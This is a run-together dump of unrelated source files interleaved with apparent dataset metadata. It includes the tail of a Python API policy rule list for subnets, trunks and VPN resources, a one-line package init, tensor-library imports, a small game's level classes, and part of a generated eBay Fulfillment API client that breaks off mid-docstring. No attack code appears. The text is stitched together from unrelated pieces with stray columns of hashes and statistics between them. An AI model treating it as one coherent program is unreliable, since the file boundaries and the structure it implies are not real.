description="Get ``segment_id`` attribute of a subnet",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/subnets"},
{"method": "GET", "path": "/subnets/{id}"},
],
),
base.APIRule(
name="update_subnet",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a subnet",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/subnets/{id}"}],
),
base.APIRule(
name="update_subnet:segment_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``segment_id`` attribute of a subnet",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/subnets/{id}"}],
),
base.APIRule(
name="update_subnet:service_types",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``service_types`` attribute of a subnet",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/subnets/{id}"}],
),
base.APIRule(
name="delete_subnet",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a subnet",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/subnets/{id}"}],
),
base.APIRule(
name="create_subnetpool",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a subnetpool",
scope_types=["project", "system"],
operations=[{"method": "POST", "path": "/subnetpools"}],
),
base.APIRule(
name="create_subnetpool:shared",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a shared subnetpool",
scope_types=["system"],
operations=[{"method": "POST", "path": "/subnetpools"}],
),
base.APIRule(
name="create_subnetpool:is_default",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``is_default`` attribute when creating a subnetpool",
scope_types=["system"],
operations=[{"method": "POST", "path": "/subnetpools"}],
),
base.APIRule(
name="get_subnetpool",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:shared_subnetpools"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a subnetpool",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/subnetpools"},
{"method": "GET", "path": "/subnetpools/{id}"},
],
),
base.APIRule(
name="update_subnetpool",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a subnetpool",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/subnetpools/{id}"}],
),
base.APIRule(
name="update_subnetpool:is_default",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``is_default`` attribute of a subnetpool",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/subnetpools/{id}"}],
),
base.APIRule(
name="delete_subnetpool",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a subnetpool",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/subnetpools/{id}"}],
),
base.APIRule(
name="onboard_network_subnets",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Onboard existing subnet into a subnetpool",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/subnetpools/{id}/onboard_network_subnets"}],
),
base.APIRule(
name="add_prefixes",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Add prefixes to a subnetpool",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/subnetpools/{id}/add_prefixes"}],
),
base.APIRule(
name="remove_prefixes",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Remove unallocated prefixes from a subnetpool",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/subnetpools/{id}/remove_prefixes"}],
),
base.APIRule(
name="create_trunk",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a trunk",
scope_types=["project", "system"],
operations=[{"method": "POST", "path": "/trunks"}],
),
base.APIRule(
name="get_trunk",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a trunk",
scope_types=["project", "system"],
operations=[
{"method": "GET", "path": "/trunks"},
{"method": "GET", "path": "/trunks/{id}"},
],
),
base.APIRule(
name="update_trunk",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a trunk",
scope_types=["project", "system"],
operations=[{"method": "PUT", "path": "/trunks/{id}"}],
),
base.APIRule(
name="delete_trunk",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a trunk",
scope_types=["project", "system"],
operations=[{"method": "DELETE", "path": "/trunks/{id}"}],
),
base.APIRule(
name="get_subports",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List subports attached to a trunk",
scope_types=["project", "system"],
operations=[{"method": "GET", "path": "/trunks/{id}/get_subports"}],
),
base.APIRule(
name="add_subports",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Add subports to a trunk",
scope_types=["project", "system"],
operations=[{"method": "PUT", "path": "/trunks/{id}/add_subports"}],
),
base.APIRule(
name="remove_subports",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete subports from a trunk",
scope_types=["project", "system"],
operations=[{"method": "PUT", "path": "/trunks/{id}/remove_subports"}],
),
base.APIRule(
name="create_endpoint_group",
check_str=("rule:regular_user"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a VPN endpoint group",
scope_types=["project"],
operations=[{"method": "POST", "path": "/vpn/endpoint-groups"}],
),
base.APIRule(
name="update_endpoint_group",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a VPN endpoint group",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/vpn/endpoint-groups/{id}"}],
),
base.APIRule(
name="delete_endpoint_group",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a VPN endpoint group",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/vpn/endpoint-groups/{id}"}],
),
base.APIRule(
name="get_endpoint_group",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get VPN endpoint groups",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/vpn/endpoint-groups"},
{"method": "GET", "path": "/vpn/endpoint-groups/{id}"},
],
),
base.APIRule(
name="create_ikepolicy",
check_str=("rule:regular_user"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create an IKE policy",
scope_types=["project"],
operations=[{"method": "POST", "path": "/vpn/ikepolicies"}],
),
base.APIRule(
name="update_ikepolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update an IKE policy",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/vpn/ikepolicies/{id}"}],
),
base.APIRule(
name="delete_ikepolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete an IKE policy",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/vpn/ikepolicies/{id}"}],
),
base.APIRule(
name="get_ikepolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get IKE policyies",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/vpn/ikepolicies"},
{"method": "GET", "path": "/vpn/ikepolicies/{id}"},
],
),
base.APIRule(
name="create_ipsecpolicy",
check_str=("rule:regular_user"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create an IPsec policy",
scope_types=["project"],
operations=[{"method": "POST", "path": "/vpn/ipsecpolicies"}],
),
base.APIRule(
name="update_ipsecpolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update an IPsec policy",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/vpn/ipsecpolicies/{id}"}],
),
base.APIRule(
name="delete_ipsecpolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete an IPsec policy",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/vpn/ipsecpolicies/{id}"}],
),
base.APIRule(
name="get_ipsecpolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get IPsec policies",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/vpn/ipsecpolicies"},
{"method": "GET", "path": "/vpn/ipsecpolicies/{id}"},
],
),
base.APIRule(
name="create_ipsec_site_connection",
check_str=("rule:regular_user"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create an IPsec site connection",
scope_types=["project"],
operations=[{"method": "POST", "path": "/vpn/ipsec-site-connections"}],
),
base.APIRule(
name="update_ipsec_site_connection",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update an IPsec site connection",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/vpn/ipsec-site-connections/{id}"}],
),
base.APIRule(
name="delete_ipsec_site_connection",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete an IPsec site connection",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/vpn/ipsec-site-connections/{id}"}],
),
base.APIRule(
name="get_ipsec_site_connection",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get IPsec site connections",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/vpn/ipsec-site-connections"},
{"method": "GET", "path": "/vpn/ipsec-site-connections/{id}"},
],
),
base.APIRule(
name="create_vpnservice",
check_str=("rule:regular_user"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a VPN service",
scope_types=["project"],
operations=[{"method": "POST", "path": "/vpn/vpnservices"}],
),
base.APIRule(
name="update_vpnservice",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a VPN service",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/vpn/vpnservices/{id}"}],
),
base.APIRule(
name="delete_vpnservice",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a VPN service",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/vpn/vpnservices/{id}"}],
),
base.APIRule(
name="get_vpnservice",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get VPN services",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/vpn/vpnservices"},
{"method": "GET", "path": "/vpn/vpnservices/{id}"},
],
),
)
__all__ = ("list_rules",)
| 41.63074
| 214
| 0.595531
| 13,084
| 109,697
| 4.772317
| 0.016279
| 0.106372
| 0.081485
| 0.101007
| 0.955174
| 0.933585
| 0.908426
| 0.880527
| 0.833667
| 0.784933
| 0
| 0.000158
| 0.249405
| 109,697
| 2,634
| 215
| 41.646545
| 0.758192
| 0.000109
| 0
| 0.719011
| 0
| 0.08251
| 0.508949
| 0.178742
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00038
| 0
| 0.00038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24eafe76fcd9520f8e174d7ca424e39434180934
| 54
|
py
|
Python
|
webviz_config/_dockerize/__init__.py
|
AlexanderSemenyak/webviz-config
|
3602901f215033bddd484ea1c13013a8addaf012
|
[
"MIT"
] | 44
|
2019-04-07T18:46:00.000Z
|
2022-03-28T02:35:58.000Z
|
webviz_config/_dockerize/__init__.py
|
AlexanderSemenyak/webviz-config
|
3602901f215033bddd484ea1c13013a8addaf012
|
[
"MIT"
] | 312
|
2019-03-29T11:49:53.000Z
|
2022-03-07T12:06:34.000Z
|
webviz_config/_dockerize/__init__.py
|
AlexanderSemenyak/webviz-config
|
3602901f215033bddd484ea1c13013a8addaf012
|
[
"MIT"
] | 46
|
2019-03-29T07:23:16.000Z
|
2022-03-28T02:35:59.000Z
|
from ._create_docker_setup import create_docker_setup
| 27
| 53
| 0.907407
| 8
| 54
| 5.5
| 0.625
| 0.545455
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 54
| 1
| 54
| 54
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7005e0e20caa71551c5c3fb422c2757a7b3626b2
| 71
|
py
|
Python
|
xitorch/linalg/__init__.py
|
AdityaJ7/xitorch
|
fec02e225df17f47854646bc57e607f5df659e1d
|
[
"BSD-3-Clause"
] | 4
|
2020-10-15T15:07:54.000Z
|
2022-01-29T23:01:10.000Z
|
xitorch/linalg/__init__.py
|
AdityaJ7/xitorch
|
fec02e225df17f47854646bc57e607f5df659e1d
|
[
"BSD-3-Clause"
] | 7
|
2020-09-16T11:44:34.000Z
|
2020-09-24T13:17:19.000Z
|
xitorch/linalg/__init__.py
|
AdityaJ7/xitorch
|
fec02e225df17f47854646bc57e607f5df659e1d
|
[
"BSD-3-Clause"
] | 2
|
2020-09-17T09:41:33.000Z
|
2020-09-17T10:00:40.000Z
|
from xitorch.linalg.solve import *
from xitorch.linalg.symeig import *
| 23.666667
| 35
| 0.802817
| 10
| 71
| 5.7
| 0.6
| 0.385965
| 0.596491
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 36
| 35.5
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
70111c9148ea45ba3ae43f52f1383a7dc1253708
| 2,125
|
py
|
Python
|
lib/levels.py
|
ricardoquesada/pywii
|
313ee8c22861c92a1bd8f93ce8d5ae4d25a15137
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
lib/levels.py
|
ricardoquesada/pywii
|
313ee8c22861c92a1bd8f93ce8d5ae4d25a15137
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
lib/levels.py
|
ricardoquesada/pywii
|
313ee8c22861c92a1bd8f93ce8d5ae4d25a15137
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
import view
from world import *
class LevelOne(view.View):
lives = 100
name = "Level One"
target = 20
def setup_level(self):
self.world.add_active( Generator((0,10)) )
self.world.add_passive( Segment(-10,20,10,20) )
self.world.add_passive( Goal(0,60,15.) )
self.world.add_passive( Floor(-200) )
return
view.View.setup_level(self)
class LevelTwo(view.View):
lives = 100
name = "Level Two"
target = 20
def setup_level(self):
self.world.add_active( Generator((0,10)) )
self.world.add_passive( Segment(-100,20,100,20) )
self.world.add_passive( Goal(0,60,15.) )
self.world.add_passive( Floor(-200) )
return
self.addGenerator((0,10))
self.addSegment(-100,20,100,20)
self.addGoal(0,60,15.)
view.View.setup_level(self)
class LevelThree(view.View):
lives = 100
name = "Level Three"
target = 20
def setup_level(self):
self.world.add_active( Generator((0,10)) )
self.world.add_passive( Segment(-100,20,100,20) )
self.world.add_passive( LimitedLifeSegment(-100,20,0,100, life=5) )
self.world.add_passive( LimitedLifeSegment(0,100,100,20, life=5) )
self.world.add_passive( Goal(0,60,15.) )
self.world.add_passive( Floor(-200) )
view.View.setup_level(self)
class LevelFour(view.View):
lives = 100
name = "Level Four"
target = 20
def setup_level(self):
self.world.add_active( Generator((0,10)) )
self.world.add_passive( Segment(-100,20,100,20) )
self.world.add_passive( LimitedLifeSegment(-100,20,0,100, life=5) )
self.world.add_passive( LimitedLifeSegment(0,100,100,20, life=5) )
self.world.add_attractor( Attractor(-100,20, force=-50) )
self.world.add_attractor( Attractor(5,-50, force=50) )
self.world.add_attractor( Attractor(100,20, force=-50) )
self.world.add_passive( Goal(0,60,15.) )
self.world.add_passive( Floor(-200) )
levels=('one',LevelOne), ('two',LevelTwo), ('three',LevelThree)
| 33.203125
| 75
| 0.618824
| 295
| 2,125
| 4.355932
| 0.152542
| 0.161089
| 0.214786
| 0.236576
| 0.862257
| 0.851362
| 0.710506
| 0.691051
| 0.691051
| 0.691051
| 0
| 0.109816
| 0.232941
| 2,125
| 63
| 76
| 33.730159
| 0.678528
| 0
| 0
| 0.666667
| 0
| 0
| 0.02354
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0.296296
| 0.037037
| 0
| 0.444444
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
704c63f9e4c395644c1acabc1c7a2e24e5f5b5e3
| 33,316
|
py
|
Python
|
src/ebay_rest/api/sell_fulfillment/api/order_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/sell_fulfillment/api/order_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/sell_fulfillment/api/order_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Fulfillment API
Use the Fulfillment API to complete the process of packaging, addressing, handling, and shipping each order on behalf of the seller, in accordance with the payment method and timing specified at checkout. # noqa: E501
OpenAPI spec version: v1.19.9
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ...sell_fulfillment.api_client import ApiClient
class OrderApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_order(self, order_id, **kwargs): # noqa: E501
"""get_order # noqa: E501
Use this call to retrieve the contents of an order based on its unique identifier, orderId. This value was returned in the getOrders call's orders.orderId field when you searched for orders by creation date, modification date, or fulfillment status. Include the optional fieldGroups query parameter set to TAX_BREAKDOWN to return a breakdown of the taxes and fees. The returned Order object contains information you can use to create and process fulfillments, including: Information about the buyer and seller Information about the order's line items The plans for packaging, addressing and shipping the order The status of payment, packaging, addressing, and shipping the order A summary of monetary amounts specific to the order such as pricing, payments, and shipping costs A summary of applied taxes and fees, and optionally a breakdown of each # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_order(order_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str order_id: The unique identifier of the order. Order ID values are shown in My eBay/Seller Hub, and are also returned by the getOrders method in the orders.orderId field. Note: A new order ID format was introduced to all eBay APIs (legacy and REST) in June 2019. In REST APIs that return Order IDs, including the Fulfillment API, all order IDs are returned in the new format, but the getOrder method will accept both the legacy and new format order ID. The new format is a non-parsable string, globally unique across all eBay marketplaces, and consistent for both single line item and multiple line item orders. These order identifiers will be automatically generated after buyer payment, and unlike in the past, instead of just being known and exposed to the seller, these unique order identifiers will also be known and used/referenced by the buyer and eBay customer support. (required)
:param str field_groups: The response type associated with the order. The only presently supported value is TAX_BREAKDOWN. This type returns a breakdown of tax and fee values associated with the order.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_order_with_http_info(order_id, **kwargs) # noqa: E501
else:
(data) = self.get_order_with_http_info(order_id, **kwargs) # noqa: E501
return data
def get_order_with_http_info(self, order_id, **kwargs): # noqa: E501
"""get_order # noqa: E501
Use this call to retrieve the contents of an order based on its unique identifier, orderId. This value was returned in the getOrders call's orders.orderId field when you searched for orders by creation date, modification date, or fulfillment status. Include the optional fieldGroups query parameter set to TAX_BREAKDOWN to return a breakdown of the taxes and fees. The returned Order object contains information you can use to create and process fulfillments, including: Information about the buyer and seller Information about the order's line items The plans for packaging, addressing and shipping the order The status of payment, packaging, addressing, and shipping the order A summary of monetary amounts specific to the order such as pricing, payments, and shipping costs A summary of applied taxes and fees, and optionally a breakdown of each # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_order_with_http_info(order_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str order_id: The unique identifier of the order. Order ID values are shown in My eBay/Seller Hub, and are also returned by the getOrders method in the orders.orderId field. Note: A new order ID format was introduced to all eBay APIs (legacy and REST) in June 2019. In REST APIs that return Order IDs, including the Fulfillment API, all order IDs are returned in the new format, but the getOrder method will accept both the legacy and new format order ID. The new format is a non-parsable string, globally unique across all eBay marketplaces, and consistent for both single line item and multiple line item orders. These order identifiers will be automatically generated after buyer payment, and unlike in the past, instead of just being known and exposed to the seller, these unique order identifiers will also be known and used/referenced by the buyer and eBay customer support. (required)
:param str field_groups: The response type associated with the order. The only presently supported value is TAX_BREAKDOWN. This type returns a breakdown of tax and fee values associated with the order.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['order_id', 'field_groups'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_order" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'order_id' is set
if ('order_id' not in params or
params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `get_order`") # noqa: E501
collection_formats = {}
path_params = {}
if 'order_id' in params:
path_params['orderId'] = params['order_id'] # noqa: E501
query_params = []
if 'field_groups' in params:
query_params.append(('fieldGroups', params['field_groups'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/order/{orderId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_orders(self, **kwargs): # noqa: E501
"""get_orders # noqa: E501
Use this call to search for and retrieve one or more orders based on their creation date, last modification date, or fulfillment status using the filter parameter. You can alternatively specify a list of orders using the orderIds parameter. Include the optional fieldGroups query parameter set to TAX_BREAKDOWN to return a breakdown of the taxes and fees. The returned Order objects contain information you can use to create and process fulfillments, including: Information about the buyer and seller Information about the order's line items The plans for packaging, addressing and shipping the order The status of payment, packaging, addressing, and shipping the order A summary of monetary amounts specific to the order such as pricing, payments, and shipping costs A summary of applied taxes and fees, and optionally a breakdown of each Important: In this call, the cancelStatus.cancelRequests array is returned but is always empty. Use the getOrder call instead, which returns this array fully populated with information about any cancellation requests. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_orders(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str field_groups: The response type associated with the order. The only presently supported value is TAX_BREAKDOWN. This type returns a breakdown of tax and fee values associated with the order.
:param str filter: One or more comma-separated criteria for narrowing down the collection of orders returned by this call. These criteria correspond to specific fields in the response payload. Multiple filter criteria combine to further restrict the results. Note: Currently, filter returns data from only the last 90 days. If the orderIds parameter is included in the request, the filter parameter will be ignored. The available criteria are as follows: creationdate The time period during which qualifying orders were created (the orders.creationDate field). In the URI, this is expressed as a starting timestamp, with or without an ending timestamp (in brackets). The timestamps are in ISO 8601 format, which uses the 24-hour Universal Coordinated Time (UTC) clock.For example: creationdate:[2016-02-21T08:25:43.511Z..] identifies orders created on or after the given timestamp. creationdate:[2016-02-21T08:25:43.511Z..2016-04-21T08:25:43.511Z] identifies orders created between the given timestamps, inclusive. lastmodifieddate The time period during which qualifying orders were last modified (the orders.modifiedDate field). In the URI, this is expressed as a starting timestamp, with or without an ending timestamp (in brackets). The timestamps are in ISO 8601 format, which uses the 24-hour Universal Coordinated Time (UTC) clock.For example: lastmodifieddate:[2016-05-15T08:25:43.511Z..] identifies orders modified on or after the given timestamp. lastmodifieddate:[2016-05-15T08:25:43.511Z..2016-05-31T08:25:43.511Z] identifies orders modified between the given timestamps, inclusive. Note: If creationdate and lastmodifieddate are both included, only creationdate is used. orderfulfillmentstatus The degree to which qualifying orders have been shipped (the orders.orderFulfillmentStatus field). In the URI, this is expressed as one of the following value combinations: orderfulfillmentstatus:{NOT_STARTED|IN_PROGRESS} specifies orders for which no shipping fulfillments have been started, plus orders for which at least one shipping fulfillment has been started but not completed. orderfulfillmentstatus:{FULFILLED|IN_PROGRESS} specifies orders for which all shipping fulfillments have been completed, plus orders for which at least one shipping fulfillment has been started but not completed. Note: The values NOT_STARTED, IN_PROGRESS, and FULFILLED can be used in various combinations, but only the combinations shown here are currently supported. Here is an example of a getOrders call using all of these filters: GET https://api.ebay.com/sell/v1/order? filter=creationdate:%5B2016-03-21T08:25:43.511Z..2016-04-21T08:25:43.511Z%5D, lastmodifieddate:%5B2016-05-15T08:25:43.511Z..%5D, orderfulfillmentstatus:%7BNOT_STARTED%7CIN_PROGRESS%7D Note: This call requires that certain special characters in the URI query string be percent-encoded: [ = %5B ] = %5D { = %7B | = %7C } = %7D This query filter example uses these codes. For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/sell/fulfillment/types/api:FilterField
